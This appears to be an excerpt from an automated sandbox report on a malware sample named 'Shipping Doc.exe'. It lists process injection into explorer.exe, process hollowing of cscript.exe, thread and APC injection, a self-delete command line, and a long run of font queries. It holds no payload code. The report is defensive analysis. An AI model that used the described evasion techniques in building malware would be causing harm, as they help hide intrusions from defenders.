          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: DE0000
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: explorer.exe, 00000006.00000000.262269287.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Users\user\Desktop\Shipping Doc.exe VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
